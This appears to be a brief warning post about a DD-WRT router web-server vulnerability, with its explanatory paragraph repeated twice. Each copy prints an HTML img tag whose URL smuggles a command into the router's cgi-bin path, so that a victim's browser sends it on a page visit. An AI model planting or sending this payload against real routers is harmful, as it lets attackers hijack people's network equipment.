http://www.dd-wrt.com/dd-wrtv3/community/developmentnews/34-dd-wrt-httpd-vulnerability-milw0rmcom-report.html
To gain control of your router all somebody has to do is put this tag in a website and have you visit it:
<img src="http://192.168.0.1/cgi-bin/;command-to-execute" alt="">
or.. if you were dumb enough to enable remote http management, they just need to send the request themselves. This is really bad.
To gain control of your router all somebody has to do is put this tag in a website and have you visit it:
<img src="http://192.168.0.1/cgi-bin/;command-to-execute" alt="">
or.. if you were dumb enough to enable remote http management, they just need to send the request themselves. This is really bad.